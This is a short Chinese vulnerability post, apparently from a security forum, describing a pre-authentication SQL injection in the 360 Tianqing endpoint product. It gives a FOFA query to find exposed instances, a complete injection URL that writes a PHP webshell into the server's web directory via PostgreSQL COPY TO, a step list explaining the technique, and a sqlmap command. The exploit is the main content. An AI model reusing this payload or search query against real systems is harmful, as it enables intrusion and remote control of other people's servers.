360天擎 rptsvcsyncpoint 前台SQL注入

破绽描绘

天擎 存在SQL注入,攻击者能够经过破绽上传木马
 


 

破绽影响

天擎
 


 

破绽复现

FOFA

title="360新天擎"

注入写shell:

https://192.168.24.196:8443/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('<?php @($_POST[1]);?>');copy O(T) to 'C:Program Files (x86)360skylar6www1.php';drop table O;--  


应用过程:
1. 经过装置包装置的普通都有root权限,因而该注入点可尝试写shell
2. 经过注入点,创立一张表 O
3. 为 表O 添加一个新字段 T 并且写入shell内容
4. Postgres数据库 运用COPY TO把一个表的一切内容都拷贝到一个文件(完成写shell)
5. 删除 表O

运用命令

sqlmap -u https://xxx.xxx.xxx.xxx:8443/api/dp/rptsvcsyncpoint?ccid=1 --dbms PostgreSQL

图片[1]-360天擎 rptsvcsyncpoint 前台SQL注入-孤勇者社区

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞9赞赏 分享
评论 抢沙发
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片